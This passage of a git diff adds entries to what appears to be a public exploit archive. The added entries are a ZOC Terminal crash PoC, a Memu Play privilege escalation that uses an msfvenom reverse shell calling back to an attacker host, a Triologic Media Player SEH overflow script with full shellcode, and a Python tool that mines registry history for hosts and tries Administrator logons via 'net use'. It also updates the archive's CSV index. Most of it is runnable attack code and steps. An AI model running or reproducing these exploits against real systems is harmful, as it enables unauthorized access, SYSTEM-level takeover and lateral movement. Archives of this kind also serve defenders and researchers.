'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48292.txt b/exploits/windows/dos/48292.txt new file mode 100644 index 000000000..7155a42ed --- /dev/null +++ b/exploits/windows/dos/48292.txt @@ -0,0 +1,22 @@ +# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.emtec.com +# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe +# Tested Version: 7.25.5 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py +#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard +#3.- Open ZOC Terminal +#4.- Select File > Create SSH Key Files... +#5.- Select "Private key file:" field erease and Paste ClipBoard +#6.- Click on "Create public/private key files..." +#7.- Crashed + +buffer = "\x41" * 2000 +f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48283.txt b/exploits/windows/local/48283.txt new file mode 100644 index 000000000..f6b3529a0 --- /dev/null +++ b/exploits/windows/local/48283.txt @@ -0,0 +1,70 @@ +# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions +# Discovery by: chuyreds +# Discovery Date: 2020-03-08 +# Vendor Homepage: https://www.memuplay.com/ +# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release +# Tested Version: 7.1.3 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Description: +# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions + +# Prerequisites +# Local, Low privilege access with restart capabilities + +# Details +# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. +# A low privilege account is able to rename the MemuService.exe file located in this same path and replace +# with a malicious file that would connect back to an attacking computer giving system level privileges +# (nt authority\system) due to the service running as Local System. +# While a low privilege user is unable to restart the service through the application, a restart of the +# computer triggers the execution of the malicious file. + +C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" +C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) + BUILTIN\Administradores:(I)(F) + BUILTIN\Usuarios:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) + +Se procesaron correctamente 1 archivos; error al procesar 0 archivos + + +C:\>sc qc MEmuSVC +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: MEmuSVC + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : MEmuSVC + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +# Proof of Concept + +1. Generate malicious .exe on attacking machine + msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe + +2. Setup listener and ensure apache is running on attacking machine + nc -lvp 443 + service apache2 start + +3. Download malicious .exe on victim machine + Open browser to http://192.168.1.130/MemuService.exe and download + +4. Overwrite file and copy malicious .exe. + Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak + Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ + +5. Restart victim machine + +6. Reverse Shell on attacking machine opens + C:\Windows\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/exploits/windows/local/48293.py b/exploits/windows/local/48293.py new file mode 100755 index 000000000..13ca75c29 --- /dev/null +++ b/exploits/windows/local/48293.py @@ -0,0 +1,79 @@ +# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) +# Date: 2020-04-04 +# Author: Felipe Winsnes +# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html +# Version: 8 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file called "poc.m3l". +# 2.- Open the Application. +# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK. +# 4.- Click on the bottom-right button that displays an arrow and has written "LIST". +# 5.- Select the file "poc.m3l". +# 6.- Profit. + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread +# Payload size: 512 bytes + +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72" +buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70" +buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b" +buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64" +buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51" +buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c" +buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57" +buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a" +buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71" +buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62" +buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69" +buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62" +buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71" +buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73" +buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d" +buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f" +buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b" +buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a" +buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54" +buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f" +buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b" +buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62" +buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50" +buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46" +buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38" +buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d" +buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70" +buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52" +buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43" +buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f" +buf += b"\x75\x4d\x30\x41\x41" + +nseh = "\x71\x41" +seh = "\x41\x4a" + +alignment = "" +alignment += "\x54\x71" # push ebx, padding +alignment += "\x58\x71" # pop eax, padding +alignment += "\x05\x20\x22" # add eax, 0x22002000 +alignment += "\x71" # Padding +alignment += "\x2D\x19\x22" # sub eax, 0x22001900 +alignment += "\x71" # Padding +alignment += "\x50\x71" # push eax, padding +alignment += "\xC3" # retn + +buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000 +f = open ("poc.m3l", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48299.txt b/exploits/windows/local/48299.txt new file mode 100644 index 000000000..654d0b495 --- /dev/null +++ b/exploits/windows/local/48299.txt @@ -0,0 +1,313 @@ +# Title: Microsoft NET USE win10 - Insufficient Authentication Logic +# Date: 2020-04-04 +# Author: hyp3rlinx +# Vendor: www.microsoft.com +# CVE: N/A + + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Windows "net use" Command + +Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. +The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. + + +[Vulnerability Type] +Insuffient Password Prompt + + +[CVE Reference] +N/A + + +[Security Issue] +The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account +is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately +we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to +has other vulnerabilities present. + +In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. +The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation. +Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less. + +Requirements: +1) Remote system built-in Administrator account is enabled +2) Origination system users account password and the remote system Administrator passwords match (reuse). + +Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. +Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue. + +However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails. +Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. + +Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections +and try them and if theres password reuse (likely) BOOM automagic logon. + +This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used. +When testing make sure to logout then log back in after changing passwords so the environment is clean. + +e.g. + +1) Passwords for both systems are different and remote built-in Administrator account active: + +C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator + +Enter the password for 'Administrator' to connect to '192.168.x.x': +System error 5 has occurred. + +Access is denied. + +2) Passwords for both origination system and remote match: + +C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator +The command completed successfully. + +By the way as a side note DCERPC calls work as well, if both systems happen to have same password. +c:\>getmac /s x.x.x.x /U Administrator + +MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same." +Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? + +Expected result: Consistent password dialog box, no matter if passwords match or not. +Actual Result: No prompt for a password if both systems passwords are the same. + +Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. + + +[Exploit/POC] +import os,re,time,signal,sys +from subprocess import * +from multiprocessing import Process + +#By John Page (aka hyp3rlinx) +#Apparition Security +#twitter.com/hyp3rlinx +#----------------------------------- +#When a remote systems built-in Administrator account is enabled and both the remote and the target system +#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. +# +#MountPoints2 and Terminal server client hints in the Windows registry can help us. +#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. +#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) +#MountPoints2 key entries are stored like '##10.2.1.40#c$' +#----------------------------------------------------------- + +BANNER=""" + _ ______________ ___ ____ __ _______ ______ + / | / / ____/_ __/ / | / __ )/ / / / ___// ____/ + / |/ / __/ / / / /| | / __ / / / /\__ \/ __/ + / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___ +/_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/ + + By Hyp3rlinx + ApparitionSec +""" + +DRIVE="X" +FINDME="The command completed successfully." +REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' +REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" +VULN_FOUND=set() +DELAY=2 #Any lower and we may get inaccurate results. +rdp_server_lst=[] + +#Return prior network logons to remote systems. +def mountpoints2(): + mntpoint2_connections=[] + try: + p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + except Exception as e: + print("[!] "+str(e)) + return False + for x in tmp: + idx = x.find("##") + clean = x[idx:] + idx2 = clean.rfind("#") + ip = clean[2:idx2] + ip = re.sub(r"#.*[A-Z,a-z]","",ip) + if ip not in mntpoint2_connections: + mntpoint2_connections.append(ip) + mntpoint2_connections = list(filter(None, mntpoint2_connections)) + p.kill() + return mntpoint2_connections + + +#Terminal server client stores remote server connections. +def rdp_svrs(): + global rdp_server_lst + try: + p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + for key in tmp: + if key.find("Servers")!=-1: + pos = key.rfind("\\") + srv = key[pos + 1:].replace("\r\n","").strip() + rdp_server_lst.append(srv) + p.kill() + except Exception as e: + print("[!] "+str(e)) + return False + return True + + +#Disconnect +def del_vuln_connection(ip): + try: + print("[!] Disconnecting vuln network logon connection.\n") + call(r"net use "+DRIVE+":"+" /del") + except Exception as e: + print("[!] "+str(e)) + + +#Check connection +def chk_connection(ip): + print("[+] Testing: "+ip) + sys.stdout.flush() + cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) + stderr, stdout = cmd.communicate() + if "Reply from" in stderr and "Destination host unreachable" not in stderr: + print("[*] Target up!") + return True + else: + print("[!] Target unreachable :(") + return False + + +#Test vuln +def Test_Password_Reuse(ip): + print("[+] Testing "+ip + " the builtin Administrator account.\n") + sys.stdout.flush() + try: + p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) + err = p.stderr.readlines() + + if err: + e = str(err) + if e.find("error 53")!=-1: + print("[*] Network path not found\n") + return + elif e.find("error 1219")!=-1: + print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") + return + elif e.find("error 85")!=-1: + print("[*] The local device name is already in use.\n") + return + else: + print(e+"\n") + + tmp = p.stdout.read() + + if FINDME in tmp: + print("[*] Password reuse for the built-in Administrator found!") + print("[+] Connected to target: "+ ip) + VULN_FOUND.add(ip+":Administrator") + del_vuln_connection(ip) + p.kill() + except Exception as e: + print("[!] "+str(e)) + + + +#Authenticate +def auth(ip): + action_process = Process(target=Test_Password_Reuse, args=(ip,)) + action_process.start() + action_process.join(timeout=5) + action_process.terminate() + + +if __name__ == "__main__": + + print(BANNER) + print("[+] Windows 'net use' Network Logon Type-3") + print("[+] Insufficient Password Prompt") + print("[+] By hyp3rlinx\n") + + time.sleep(3) + + print("[+] Deleting any existing network logons to start clean.") + + #Make sure no exist sessions already exist. + call(r"net use * /del /y") + sys.stdout.flush() + time.sleep(1) + + + #Grab previous connections from MountPoints2 if any. + rdp_svrs() + svrlst=mountpoints2() + + if svrlst: + svrlst + rdp_server_lst + else: + svrlst = rdp_server_lst + + if not svrlst: + print("[*] No MountPoints2 artifacts found, enter an IP.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + else: + #We have MountPoints2 or RDP Server list IP we can try. + for ip in svrlst: + if chk_connection(ip): + auth(ip) + + time.sleep(DELAY) + + + if len(VULN_FOUND) != 0: + print("[*] Located the following vulnerable systems:") + sys.stdout.flush() + for v in VULN_FOUND: + print("[+] "+v) + else: + print("[+] All previous attempts failed, enter an IP and give it a shot!.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + + + +[POC Video URL] +https://www.youtube.com/watch?v=Je93Neb0k8g + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: February 28, 2020 +MSRC "behavior you are reporting is by design" : March 30, 2020 +April 5, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 083c698cc..ebfba676e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6692,6 +6692,14 @@ id,file,description,date,author,type,platform,port 48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows, 48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows, 48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows, +48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows, +48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows, +48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows, +48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows, +48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11011,6 +11019,9 @@ id,file,description,date,author,type,platform,port 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows, 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows, 48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows, +48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows, +48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows, +48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42526,3 +42537,9 @@ id,file,description,date,author,type,platform,port 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php, +48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php, +48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple, +48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple, +48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php, +48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php, +48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,